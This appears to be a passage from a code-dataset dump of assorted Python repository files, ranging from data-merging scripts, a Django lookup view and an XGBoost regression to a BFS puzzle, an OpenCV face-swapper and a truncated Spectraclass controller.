normalize_caseless(text):\n return unicodedata.normalize(\"NFKD\", text.casefold())\n\ndef caseless_equal(left, right):\n return normalize_caseless(left) == normalize_caseless(right)\n\ndef num(s):\n s = s.strip()\n return int(s) if s else 0\n\nCAPITA_CONST = 100000\n\nlib_file = open('raw/country-libs.csv')\nlibs = csv.DictReader(lib_file)\n\npop_file = open('raw/country-pop-worldbank.csv')\npops = csv.DictReader(pop_file)\n\nhomicide_file = open('cleaned/homicide-country.csv')\nhomicides = csv.DictReader(homicide_file)\n\nrows = []\n\nfor pop in pops:\n country = pop['Country Name']\n population = num(pop['2016'])\n row = {\n 'Country': country,\n 'Population': population\n }\n\n for lib in libs:\n if caseless_equal(lib['Country'], country):\n libraries = num(lib['Public Libraries'])\n libs_per_capita = libraries/population*CAPITA_CONST if (libraries > 0 and population > 0) else -1\n if libs_per_capita > 0:\n row['Libraries'] = libraries\n row['Libraries per Capita'] = libs_per_capita\n break\n\n for homicide in homicides:\n if caseless_equal(homicide['Country'], country):\n row['Homicides'] = homicide['Count']\n row['Homicides per Capita'] = homicide['Rate']\n break\n\n if ('Libraries per Capita' in row.keys() and 'Homicides per Capita' in row.keys()):\n rows.append(row)\n\n lib_file.seek(0)\n homicide_file.seek(0)\n\ndf = pd.DataFrame(rows)\ndf.to_csv('cleaned/homicides-libraries.csv', index=False)\n","repo_name":"ruddfawcett/stats530","sub_path":"mergers/homicide-lib.py","file_name":"homicide-lib.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"9644676806","text":"# create a bank account. 
Saving account with minimum 500 balance and current account with no minimum balance.\n\naccountNo = input(\"Enter Account Number: \")\ncustomerName = input(\"Enter Customer Name: \")\naccountType = input(\"Enter Account Type: \")\nbalance = float(input(\"Enter Balance: \"))\n\n\ndef showAccount():\n    print(f\"Account: {accountNo} \\n\"\n          f\"Customer Name: {customerName} \\n\"\n          f\"Account Type: {accountType} \\n\"\n          f\"Balance: {balance}\")\n\n\ndef withdraw(balance, amount, accountType):\n    if accountType == \"SAVINGS\":\n        new_balance = balance - amount\n        if new_balance < 500:\n            raise Exception(\"Insufficient Balance\")\n        else:\n            balance = new_balance\n            return balance\n    elif accountType == \"CURRENT\":\n        balance = balance - amount\n        return balance\n\n\nshowAccount()\namount = float(input(\"Enter amount to be withdrawn: \"))\ntype = \"SAVINGS\"\nbalance = withdraw(balance, amount, type)\nprint(\"After withdrawing\")\nshowAccount()\n","repo_name":"amalpushp77/complete-python-tutorial","sub_path":"2. Python Part 2 - OOP/Practical Examples/7. TraditionalStyle.py","file_name":"7. TraditionalStyle.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"7615784568","text":"# Standard library imports\nimport pandas as pd\nimport numpy as np\nfrom datetime import datetime\nimport re\nimport matplotlib.pylab as plt\nfrom math import sqrt\nimport os\n\nfrom matplotlib.pyplot import rcParams\nrcParams['figure.figsize']=15,6\n\n# Preprocessing and data splitting\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.model_selection import train_test_split\n\n# Import the model\nimport xgboost as xgb\n\n# Model hyperparameter tuning tools\nfrom sklearn.model_selection import cross_val_score,KFold\nfrom sklearn.model_selection import GridSearchCV\n\n# Model saving tools\nfrom sklearn.externals import joblib\n\n# Error metrics\nfrom sklearn.metrics import mean_squared_error, r2_score\n\n# import the data\n# dataparse = lambda dates: datetime.strptime(dates, '%Y-%m-%d')\n# data = pd.read_excel('xxxx/acitivedata.xlsx', parse_dates=['Day'], index_col='Day', date_parser=dataparse)\n#\n# # get the separate series\n# ts1 = data['login']\n# ts2 = data['delivery']\n# ts3 = data['registration']\n#\n# # Handle outliers in the data\n# ts3['2016-09-23'] = ts3['2016-09-22']\n#\n# ts2['2016-09-24'] = ts2['2016-09-17']\n# ts2['2016-09-25'] = ts2['2016-09-18']\n#\n# ts1['2016-09-24'] = ts1['2016-09-17']\n# ts1['2016-09-25'] = ts1['2016-09-18']\n#\n# # Convert the data into a supervised sequence\n# X = ts1.as_matrix()\n# # Turn the series into a supervised learning problem\n# lag = 7\n#\n# X_matrix = []\n# y = []\n# for i in range(len(X) - lag):\n#     sample = []\n#     for n in range(lag):\n#         sample.append(X[i + n])\n#\n#     X_matrix.append(sample)\n#     y.append(X[i + lag])\n#\n# # The last 7 data points are used to predict the next day\n# X_test_predict = []\n# for i in range(lag):\n#     X_test_predict.append(X[-(lag - i)])\n#\n# X_matrix.append(X_test_predict)\n#\n# XX = np.array(X_matrix)\n# y = np.array(y)\n\nimport pymysql\nconn = pymysql.connect(\"localhost\", \"root\", \"hj123456\", \"mcm\",3306,charset=\"utf8mb4\")\n# Create a cursor object\ncursor = conn.cursor()\n# sql = \"select product_id, count(product_id) from pacifier group by product_id order by count(product_id) DESC\"\n# sql = \"select product_title, count(product_title) from pacifier group by product_title order by count(product_title) DESC\"\nsql = \"select DATEdiff(review_date,'2004-6-19') from microwave where product_parent = '423421857' group by DATEdiff(review_date,'2004-6-19') order by DATEdiff(review_date,'2004-6-19') ASC\"\n\n# sql = 'select star_rating, count(star_rating) from microwave where 
verified_purchase=\"Y\" group by star_rating'\n\ncursor.execute(sql)\nres = cursor.fetchall()\n\n\nlens = len(res)\nX_train = np.zeros((lens,1),dtype=float)\ny_train = np.zeros((lens,1),dtype=float)\nfor i in range(lens):\n    print(res[i][0])\n    X_train[i] = res[i][0] - 2558\n\n\n\n\n# Define the training data\n\n\nsql = \"select avg(scores) from microwave where product_parent = '423421857' group by DATEdiff(review_date,'2004-6-19') order by DATEdiff(review_date,'2004-6-19') ASC\"\n\ncursor.execute(sql)\nres = cursor.fetchall()\n\nfor i in range(lens):\n    print(res[i][0])\n    y_train[i] = res[i][0]\n\n\n\ncursor.close()\nconn.close()\n\n\n\n\n# set up the regressor\nxgb_model = xgb.XGBRegressor()\n# perform a grid search\ntweaked_model = GridSearchCV(\n    xgb_model,\n    {\n        'max_depth':[1,2,5,10,20],\n        'n_estimators':[20,30,50,70,100],\n        'learning_rate':[0.1,0.2,0.3,0.4,0.5]\n    },\n    cv = 3,\n    verbose = 1,\n    n_jobs = -1,\n    scoring = 'neg_median_absolute_error',\n)\n\ntweaked_model.fit(X_train,y_train)\nprint('Best: %f using %s'%(tweaked_model.best_score_, tweaked_model.best_params_))\n\n\n# saving and loading models\ndef save_model(model,filename):\n    return joblib.dump(model,filename)\n\ndef load_model(filename):\n    return joblib.load(filename)\n\n# 4. Predict on new data\nsave_model(tweaked_model,'XGB-model_lag=7.pkl')\nmodel = load_model('XGB-model_lag=7.pkl')\n\nmodel1 = xgb.XGBRegressor(learning_rate= 0.1, max_depth= 5, n_estimators= 100)\n\nX_predict_test = np.zeros((365,1),dtype=float)\ny_predict = np.zeros((365,1),dtype=float)\n\nfor i in range(365):\n    X_predict_test[i] = X_train[lens-1] + i\n\n# model1.fit(X_predict,y_predict)\n#\n# use the last 100 days of data as the test data\nX_predict = model1.predict(X_predict_test)\n\n# plt.plot(y_train[-100:],color='blue',label='actual')\nplt.plot(X_predict,color='red',label='predict')\n# plt.legend(loc='best')\n# plt.title('RMSE:%.4f'%np.sqrt((sum((X_predict[:-1]-y_train[-100:])**2))/len(X_predict)))\n# plt.show()\n# print(\"the next day predict is %.f\"%X_predict[-1])\n\n# encoding=utf-8\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n","repo_name":"SunshineHJian/--hujian","sub_path":"code/Xgboost2.py","file_name":"Xgboost2.py","file_ext":"py","file_size_in_byte":4429,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"23545117307","text":"# -*- coding: utf-8 -*-\nfrom django.db.models import Q\nfrom django.db import connection # Used for django tenants.\nfrom rest_framework.views import APIView\nfrom rest_framework import authentication, permissions, status\nfrom rest_framework.response import Response\nfrom tenant_foundation.models import Customer, Organization\nfrom tenant_api.serializers.customer import CustomerRetrieveUpdateDestroySerializer\n\n\nclass FindCustomerMatchingAPIView(APIView):\n    \"\"\"\n    API endpoint used for looking up the customer that matches the supplied e-mail and/or organization name.\n    \"\"\"\n    permission_classes = (\n        permissions.IsAuthenticated,\n    )\n\n    def get(self, request):\n        # Get our extracts.\n        customer = None\n        email = self.request.GET.get('email', None)\n        company_name = self.request.GET.get('organization_name', None)\n\n        if company_name != '' and email != '':\n            print(\"Searching: company_name and email\")\n            customer = Customer.objects.filter(\n                email__iexact=email,\n                organization__name__iexact=company_name\n            ).first()\n\n        elif email == '' and company_name != '':\n            print(\"Searching: company_name\")\n            customer = Customer.objects.filter(\n                organization__name__iexact=company_name\n            ).first()\n\n        elif email != '' and company_name == '':\n            
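# Added note (not in the original): iexact performs a case-insensitive exact\n            # match, and .first() returns None when nothing matches; the code below\n            # treats that as an empty result.\n            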
print(\"Searching: email\")\n customer = Customer.objects.filter(\n email__iexact=email,\n ).first()\n\n print(\"Found\", customer)\n\n if customer:\n serializer = CustomerRetrieveUpdateDestroySerializer(customer, many=False)\n return Response(\n data=serializer.data,\n status=status.HTTP_200_OK\n )\n\n else:\n # Return our results.\n return Response(\n data={},\n status=status.HTTP_200_OK\n )\n","repo_name":"over55/workery-django","sub_path":"workery/tenant_api/views/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"7"} +{"seq_id":"42131712510","text":"\"\"\"empty message\n\nRevision ID: 3bdb97b5431d\nRevises: af7f2fd8626b\nCreate Date: 2021-08-24 16:52:31.042259\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '3bdb97b5431d'\ndown_revision = 'af7f2fd8626b'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('user_status', schema=None) as batch_op:\n batch_op.add_column(sa.Column('growing_select', sa.Integer(), nullable=True))\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('user_status', schema=None) as batch_op:\n batch_op.drop_column('growing_select')\n\n # ### end Alembic commands ###\n","repo_name":"kuyang95/1319_KakaoChatBot","sub_path":"migrations/versions/3bdb97b5431d_.py","file_name":"3bdb97b5431d_.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"14191228583","text":"\"\"\"This function gives a vector of all the intensity of the detected spots.\n\nGiven the 3D matrices of raw data and detected spots, the output is a 7xN\nmatrix in which the components are the spot label, volume, intensity, max \nvalue and the 3 coordinates (z, x, y).\n\"\"\"\n\n\nimport numpy as np\nfrom skimage.measure import regionprops_table, regionprops\nfrom PyQt5 import QtWidgets\n\n\n\nclass SpotsIntensityRecord:\n \"\"\"Main class, does all the job\"\"\"\n def __init__(self, spts_segm, raw_spts): # input_data are: spts_segm, raw_spts\n\n if spts_segm.max() > 0:\n rgp = regionprops_table(spts_segm.astype(np.int32), raw_spts, properties=[\"label\", \"area\", \"intensity_image\", \"max_intensity\", \"centroid\"])\n rgp_cc = regionprops(spts_segm.astype(np.int32)) # regionprops to measure the centroids coordinates (the prvious gives approximation of it)\n rgp_arr = []\n for k in range(len(rgp[\"label\"])):\n rgp_arr.append([rgp_cc[k][\"label\"], int(np.round(rgp_cc[k][\"centroid\"][0])), int(np.round(rgp_cc[k][\"centroid\"][1])), int(np.round(rgp_cc[k][\"centroid\"][2]))]) # array with not approximate centroids-coordinates and label\n\n rgp_arr = np.asarray(rgp_arr) # convert to array\n \n for k in range(rgp[\"label\"].size): # substitute the approximated centroids-coordinates with the non approximated ones\n idx2subst = np.where(rgp_arr[:, 0] == rgp[\"label\"][k])[0][0] # check the indexes of the label\n rgp[\"centroid-0\"][k], rgp[\"centroid-1\"][k], rgp[\"centroid-2\"][k] = rgp_arr[idx2subst][1], rgp_arr[idx2subst][2], rgp_arr[idx2subst][3] # substitute centroids-coordinates with the proper not approximated ones\n\n spts_ints_ctrs = np.zeros((7, rgp[\"area\"].size), dtype=np.int32)\n\n pbar = 
ProgressBar(total1=len(rgp))\n pbar.show()\n pbar.update_progressbar(0)\n\n for k in range(rgp[\"area\"].size):\n pbar.update_progressbar(k)\n spts_ints_ctrs[:, k] = np.array([rgp['label'][k], rgp['area'][k], rgp['intensity_image'][k].sum(), rgp['max_intensity'][k], rgp['centroid-0'][k], rgp['centroid-1'][k], rgp['centroid-2'][k]])\n\n pbar.close()\n\n else:\n spts_ints_ctrs = np.array([[], []])\n \n self.spts_ints_ctrs = spts_ints_ctrs\n\n\n\nclass ProgressBar(QtWidgets.QWidget):\n \"\"\"Simple progressbar widget\"\"\"\n def __init__(self, parent=None, total1=4):\n super(ProgressBar, self).__init__(parent)\n self.name_line1 = QtWidgets.QLineEdit()\n\n self.progressbar1 = QtWidgets.QProgressBar()\n self.progressbar1.setMinimum(1)\n self.progressbar1.setMaximum(total1)\n\n main_layout = QtWidgets.QGridLayout()\n main_layout.addWidget(self.progressbar1, 0, 0)\n\n self.setLayout(main_layout)\n self.setWindowTitle(\"Progress\")\n self.setGeometry(500, 300, 300, 50)\n\n def update_progressbar(self, val1):\n \"\"\"Method to update progressbar\"\"\"\n self.progressbar1.setValue(val1)\n QtWidgets.qApp.processEvents()\n","repo_name":"ant-trullo/smFiSH_software","sub_path":"SpotsIntensityRecord.py","file_name":"SpotsIntensityRecord.py","file_ext":"py","file_size_in_byte":3621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"34989407429","text":"import logging\nimport os\n\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\n\n# DB\ndb_file = os.path.join(BASE_DIR, \"products.db\")\ndb_table_structure = [ \"name\", \"price\", \"id\", \"pk\", \"timestamp\"]\nupdate_time_threshold = -6 # How many hours between updates\n\n# HTTP Requests\nhost = 'www.xxl.fi'\nurl_paths = {\n # Trekking equipment\n \"tents\": \"/retkeily-metsastys/telttailu/c/200200\",\n \"fishing\": \"/retkeily-metsastys/kalastus/c/220000\",\n \"camping_equipment\": \"/retkeily-metsastys/retkeilyvalineet/c/200600\",\n \"sleeping_gear\": \"/retkeily-metsastys/makuupussit-ja-makuualustat/c/201000\",\n \"drinking_bags\": \"/urheilu-ja-pallopelit/reput-ja-kassit/juomareput/c/100606\",\n # Clothes\n \"trekking_shoes\": \"/retkeily-metsastys/vaelluskengat-ja-metsastyskengat/c/200800\"\n}\n\n\n# Logging\nlog_level = logging.INFO\nlog_file = os.path.join(BASE_DIR, 'sniffer.log')\nlog_file_mode = \"w\"\ndb_logger_name = 'DBManager'\nhttp_logger_name = 'HttpClient'","repo_name":"jalspons/xxl_campaign_sniffer","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"14895430282","text":"from collections import deque\n\ndx = [1, 0, -1, 0]\ndy = [0, 1, 0, -1]\n\ndef bfs():\n cnt = 1\n while q:\n x, y = q.popleft()\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n if 0 <= nx < m and 0 <= ny < n:\n if not visited[nx][ny] and war[nx][ny] == war[x][y]:\n q.append((nx, ny))\n visited[nx][ny] = 1\n cnt += 1\n\n return cnt\n\nn, m = map(int, input().split())\nwar = [list(input()) for _ in range(m)]\nvisited = [[0] * n for i in range(m)]\n\nmy, enemy = 0, 0\n\nq = deque()\nfor i in range(m):\n for j in range(n):\n if not visited[i][j]:\n q.append((i, j))\n visited[i][j] = 1\n if war[i][j] == \"W\":\n my += bfs()**2\n else:\n enemy += bfs()**2\n\nprint(my, enemy)","repo_name":"JiyuChoi/Algorithm-Study","sub_path":"BOJ/[BFS] 전쟁 - 전투.py","file_name":"[BFS] 전쟁 - 
전투.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71901064864","text":"import numpy as np\nimport cv2\nimport os\n\nclass ModelParams():\n mean = [104, 117, 123]\n scale = 1.0\n in_width = 300\n in_height = 300\n\nclass Paths():\n folder_path = '../visuals'\n facial_landmarks_model_path = '../model/lbfmodel.yaml'\n model_path = '../model/deploy.prototxt'\n model_config_path = '../model/res10_300x300_ssd_iter_140000.caffemodel'\n\nclass FaceSwapper:\n __image = None\n __file = None\n __model_params = ModelParams()\n __paths = Paths()\n\n __face_detector = None\n __landmark_detector_obj = None\n\n def __init__(self):\n self.__face_detector = cv2.dnn.readNetFromCaffe(self.__paths.model_path, self.__paths.model_config_path)\n self.__landmark_detector_obj = cv2.face.createFacemarkLBF()\n self.__landmark_detector_obj.loadModel(self.__paths.facial_landmarks_model_path)\n\n def run(self):\n self.__loadImage()\n if (self.__image.any()):\n blob = cv2.dnn.blobFromImage(self.__image, scalefactor=self.__model_params.scale, size=(self.__model_params.in_width, self.__model_params.in_height),\n mean=self.__model_params.mean, swapRB=False, crop=False)\n self.__face_detector.setInput(blob)\n detections = self.__face_detector.forward()\n bbox = self.__getFaceBoundingBox(self.__image, detections)\n\n if (len(bbox) == 2):\n image_dst = self.__image.copy()\n retval, landmarks_list = self.__landmark_detector_obj.fit(image_dst, bbox)\n\n self.__warpSrcToDstFace(self.__image, image_dst, landmarks_list[0][0], landmarks_list[1][0])\n self.__warpSrcToDstFace(self.__image, image_dst, landmarks_list[1][0], landmarks_list[0][0])\n\n cv2.imshow('Final frame, press any key to save the results', image_dst)\n cv2.waitKey(0)\n\n self.__saveResult(image_dst, self.__file)\n else:\n print('[ERROR] Not enough faces detected across the image. Only 2 are needed to proceed')\n else:\n print('[WARINING] No image loaded. 
Finishing the program.')\n\n cv2.destroyAllWindows()\n\n def __warpSrcToDstFace(self, src_img, dst_img, src_face_landmarks, dst_face_landmarks):\n face_1_dst_landmarks = []\n face_2_dst_landmarks = []\n\n hullIndex = cv2.convexHull(np.array(src_face_landmarks), returnPoints=False)\n\n for i in range(0, len(hullIndex)):\n face_1_dst_landmarks.append(src_face_landmarks[hullIndex[i][0]])\n face_2_dst_landmarks.append(dst_face_landmarks[hullIndex[i][0]])\n\n rect = (0, 0, dst_img.shape[1], dst_img.shape[0])\n\n dt = self.__calculateDelaunayTriangles(rect, face_2_dst_landmarks)\n if len(dt) == 0:\n print(\"No Delanauy triangles calculated\")\n\n for i in range(0, len(dt)):\n t1 = []\n t2 = []\n\n for j in range(0, 3):\n t1.append(face_1_dst_landmarks[dt[i][j]])\n t2.append(face_2_dst_landmarks[dt[i][j]])\n\n self.__warpTriangle(src_img, dst_img, t1, t2)\n\n def __rectContains(self, rect, point):\n if point[0] < rect[0]:\n return False\n elif point[1] < rect[1]:\n return False\n elif point[0] > rect[2]:\n return False\n elif point[1] > rect[3]:\n return False\n return True\n\n def __applyAffineTransform(self, src, srcTri, dstTri, size):\n warpMat = cv2.getAffineTransform(np.float32(srcTri), np.float32(dstTri))\n dst = cv2.warpAffine(src, warpMat, (size[0], size[1]), None,\n flags=cv2.INTER_LINEAR, borderMode=cv2.BORDER_REFLECT_101)\n\n return dst\n \n def __warpTriangle(self, img1, img2, t1, t2):\n r1 = cv2.boundingRect(np.float32([t1]))\n r2 = cv2.boundingRect(np.float32([t2]))\n\n t1Rect = []\n t2Rect = []\n t2RectInt = []\n\n for i in range(0, 3):\n t1Rect.append(((t1[i][0] - r1[0]), (t1[i][1] - r1[1])))\n t2Rect.append(((t2[i][0] - r2[0]), (t2[i][1] - r2[1])))\n t2RectInt.append(((t2[i][0] - r2[0]), (t2[i][1] - r2[1])))\n\n mask = np.zeros((r2[3], r2[2], 3), dtype=np.float32)\n cv2.fillConvexPoly(mask, np.int32(t2RectInt), (1.0, 1.0, 1.0), 16, 0)\n\n img1Rect = img1[r1[1]:r1[1] + r1[3], r1[0]:r1[0] + r1[2]]\n\n size = (r2[2], r2[3])\n\n img2Rect = self.__applyAffineTransform(img1Rect, t1Rect, t2Rect, size)\n\n img2Rect = img2Rect * mask\n\n img2[r2[1]:r2[1]+r2[3], r2[0]:r2[0]+r2[2]] = img2[r2[1]:r2[1]+r2[3], r2[0]:r2[0]+r2[2]] * ((1.0, 1.0, 1.0) - mask)\n img2[r2[1]:r2[1]+r2[3], r2[0]:r2[0]+r2[2]] = img2[r2[1]:r2[1]+r2[3], r2[0]:r2[0]+r2[2]] + img2Rect\n\n def __calculateDelaunayTriangles(self, rect, points):\n subdiv = cv2.Subdiv2D(rect)\n\n for p in points:\n if p[0] > self.__image.shape[1]:\n p[0] = self.__image.shape[1] - 1\n\n if p[1] > self.__image.shape[0]:\n p[1] = self.__image.shape[0] - 1\n\n subdiv.insert((p[0], p[1]))\n\n triangleList = subdiv.getTriangleList()\n\n delaunayTri = []\n\n for t in triangleList:\n pt = []\n pt.append((t[0], t[1]))\n pt.append((t[2], t[3]))\n pt.append((t[4], t[5]))\n\n pt1 = (t[0], t[1])\n pt2 = (t[2], t[3])\n pt3 = (t[4], t[5])\n\n if self.__rectContains(rect, pt1) and self.__rectContains(rect, pt2) and self.__rectContains(rect, pt3):\n ind = []\n for j in range(0, 3):\n for k in range(0, len(points)):\n if(abs(pt[j][0] - points[k][0]) < 1.0 and abs(pt[j][1] - points[k][1]) < 1.0):\n ind.append(k)\n if len(ind) == 3:\n delaunayTri.append((ind[0], ind[1], ind[2]))\n\n return delaunayTri\n\n def __getFaceBoundingBox(self, image, detections, detection_threshold=0.90):\n height, width = image.shape[:2]\n faces = []\n\n for i in range(detections.shape[2]):\n confidence = detections[0, 0, i, 2]\n\n if (confidence >= detection_threshold):\n box = detections[0, 0, i, 3:7] * np.array([width, height, width, height])\n (x1, y1, x2, y2) = 
box.astype(\"int\")\n\n face_width = x2 - x1\n face_height = y2 - y1\n\n faces.append([x1, y1, face_width, face_height])\n \n return np.array(faces).astype(int)\n\n def __loadImage(self):\n try:\n for file in os.listdir(self.__paths.folder_path):\n self.__file = file\n self.__image = cv2.imread(self.__paths.folder_path + '/' + file, cv2.IMREAD_COLOR)\n print('[INFO] Loaded image')\n except:\n print('[ERROR] An error occured while reading the images')\n\n def __saveResult(self, image, image_name):\n try:\n filename = self.__paths.folder_path + '/' + 'swapped-' + image_name\n cv2.imwrite(filename, image)\n print('[INFO] Correctly saved image as:', filename)\n except:\n print('[ERROR] An error occurred while saving the image')\n\n\n\nif __name__ == \"__main__\":\n FaceSwapper_obj = FaceSwapper()\n FaceSwapper_obj.run()","repo_name":"Josgonmar/Face-swapper","sub_path":"src/FaceSwapper.py","file_name":"FaceSwapper.py","file_ext":"py","file_size_in_byte":7349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"22838814673","text":"#!/usr/bin/env python3\r\n__author__ = 'Gerry Gabrisch (geraldg@lummi-nsn.gov)'\r\n__date__ = 'February 2023'\r\n\r\nimport sys\r\nimport traceback\r\nimport arcpy\r\nimport os\r\n\r\ntry:\r\n ######### USER DEFINED PARAMETERS ####################\r\n workspace = r\"E:\\GISPublicGerry20210211\\GerryG\\GPS\\Export\"\r\n out_fc = r\"C:\\gTemp\\all_gnss_pre2020.shp\"\r\n ################################################################\r\n print('Running...')\r\n #a list of files and their paths to merge together...\r\n feature_classes = []\r\n #walk the directory and all subdirectories and get any file that is not a PosnPnt.shp\r\n for dirpath, dirnames, datatypes in arcpy.da.Walk(workspace,datatype=\"FeatureClass\",type=\"Point\"):\r\n for filename in datatypes:\r\n if filename == 'PosnPnt.shp':\r\n pass\r\n else:\r\n feature_classes.append(os.path.join(dirpath, filename))\r\n arcpy.management.Merge(feature_classes, out_fc, \"\", \"ADD_SOURCE_INFO\")\r\n print('Finished without error')\r\nexcept:\r\n tb = sys.exc_info()[2]\r\n tbinfo = traceback.format_tb(tb)[0]\r\n print (\"PYTHON ERRORS:\\nTraceback info:\\n\" + tbinfo + \"\\nError Info:\\n\" + str(sys.exc_info()[1]))\r\n","repo_name":"LummiGIS/merge_all_trimble_rover_files","sub_path":"merge_all_trimble_gnss_files.py","file_name":"merge_all_trimble_gnss_files.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"30663478609","text":"from typing import List\n\n\nclass Solution:\n def addOperators(self, num: str, target: int) -> List[str]:\n def dfs(left, right, op1, op2, op3):\n op = op1 + op2 * op3\n if not right:\n if op == target:\n res.append(left)\n return\n r = int(right[0])\n dfs(left + '+' + right[0], right[1:], op, 1, r)\n dfs(left + '-' + right[0], right[1:], op, -1, r)\n dfs(left + '*' + right[0], right[1:], op1, op2 * op3, r)\n if op3:\n dfs(left + right[0], right[1:], op1, op2, op3 * 10 + r)\n\n res = []\n dfs(num[0], num[1:], 0, 1, int(num[0])) # exp can always be truncated to op1+op2*op3\n return res\n\n\nmine = sorted(Solution().addOperators(\"123456789\", 45))\n","repo_name":"yutao-li/leetcode","sub_path":"282.py","file_name":"282.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"36738103857","text":"import os, ipywidgets as ipw\nfrom 
spectraclass.model.base import SCSingletonConfigurable\nfrom spectraclass.util.logs import LogManager, lgm, exception_handled, log_timing\nfrom typing import List, Union, Tuple, Optional, Dict, Callable, Set\nfrom spectraclass.gui.control import UserFeedbackManager, ufm\nfrom spectraclass.gui.spatial.widgets.markers import Marker\nimport numpy as np\nimport xarray as xa\n\nclass ActionEvent(object):\n\n def __init__( self, type: str ):\n super(ActionEvent, self).__init__()\n self._type = type\n\nclass LabelEvent(ActionEvent):\n\n def __init__( self, type: str, label_map: np.ndarray ):\n super(LabelEvent, self).__init__( type )\n self._label_map = label_map\n\n @property\n def label_map(self):\n return self._label_map\n\nclass SpectraclassController(SCSingletonConfigurable):\n\n HOME = os.path.dirname( os.path.dirname( os.path.dirname(os.path.realpath(__file__)) ) )\n custom_theme = False\n\n def __init__(self):\n super(SpectraclassController, self).__init__()\n self._action_events = []\n\n @classmethod\n def set_spectraclass_theme(cls):\n from IPython.display import display, HTML\n if cls.custom_theme:\n theme_file = os.path.join( cls.HOME, \"themes\", \"spectraclass.css\" )\n with open( theme_file ) as f:\n css = f.read().replace(';', ' !important;')\n display(HTML('Customized changes loaded.' % css))\n\n def addActionEvent(self, event: ActionEvent ):\n self._action_events.append( event )\n\n def popActionEvent(self) -> ActionEvent:\n return self._action_events.pop()\n\n def lastActionEvent(self) -> ActionEvent:\n return self._action_events[-1]\n\n def process_menubar_action(self, mname, dname, op, b ):\n print(f\" process_menubar_action.on_value_change: {mname}.{dname} -> {op}\")\n\n def show_gpu_usage(self):\n os.system(\"nvidia-smi\")\n\n @property\n def color_map(self) -> str:\n from spectraclass.gui.pointcloud import PointCloudManager, pcm\n return pcm().color_map\n\n @exception_handled\n def update_current_class(self, iclass: int ):\n from spectraclass.gui.lineplots.manager import GraphPlotManager, gpm\n from spectraclass.model.labels import LabelsManager, lm\n from spectraclass.gui.spatial.map import MapManager, mm\n gids = lm().getGids( iclass )\n gpm().plot_graph( Marker( \"marker\", gids, iclass ) )\n mm().set_region_class( iclass )\n\n def gui( self, **kwargs ):\n raise NotImplementedError()\n\n @exception_handled\n def mark(self):\n from spectraclass.model.labels import LabelsManager, lm\n from spectraclass.gui.pointcloud import PointCloudManager, pcm\n # lgm().log(f\" ----> Controller[{self.__class__.__name__}] -> MARK \")\n\n @exception_handled\n def mask(self):\n from spectraclass.model.labels import LabelsManager, lm\n from spectraclass.gui.spatial.map import MapManager, mm\n lgm().log(f\" ----> Controller[{self.__class__.__name__}] -> MASK \")\n# mm().create_mask( lm().current_cid )\n\n @exception_handled\n def clear(self):\n from spectraclass.gui.pointcloud import PointCloudManager, pcm\n from spectraclass.gui.lineplots.manager import GraphPlotManager, gpm\n from spectraclass.model.labels import LabelsManager, lm\n from spectraclass.gui.spatial.map import MapManager, mm\n lgm().log(f\" ----> Controller[{self.__class__.__name__}] -> CLEAR \")\n lm().clearMarkers()\n mm().clearMarkers()\n gpm().clear()\n pcm().clear()\n mm().plot_labels_image()\n\n @exception_handled\n def embed(self):\n from spectraclass.gui.spatial.map import MapManager, mm\n from spectraclass.gui.pointcloud import PointCloudManager, pcm\n from spectraclass.reduction.embedding import ReductionManager, 
rm\n lgm().log(f\" ----> Controller[{self.__class__.__name__}] -> EMBED \")\n ufm().show( \"Computing 3D embedding\" )\n mm().update_pcm()\n embedding = rm().umap_embedding()\n pcm().update_plot( points=embedding )\n ufm().clear()\n\n @exception_handled\n def undo_action(self):\n from spectraclass.gui.pointcloud import PointCloudManager, pcm\n from spectraclass.gui.spatial.map import MapManager, mm\n from spectraclass.model.labels import LabelsManager, Action, lm\n from spectraclass.gui.lineplots.manager import GraphPlotManager, gpm\n action: Optional[Action] = lm().popAction()\n if action is not None:\n lgm().log(f\" ----> Controller[{self.__class__.__name__}] -> UNDO: {action} \")\n if action.type == \"spread\":\n marker = lm().popMarker( \"labels\" )\n lgm().log(f\"undo_action-> pop marker: {marker}\")\n mm().plot_labels_image( lm().get_label_map() )\n if action.type == \"classify\":\n mm().plot_labels_image( lm().get_label_map() )\n\n @log_timing\n def cluster(self):\n from spectraclass.learn.cluster.manager import clm\n from spectraclass.data.base import DataManager, dm\n from spectraclass.gui.spatial.map import MapManager, mm\n ufm().show(f\"Creating clusters using {clm().mid} \")\n cluster_input: xa.DataArray = dm().getModelData()\n cluster_image: xa.DataArray = clm().cluster( cluster_input )\n 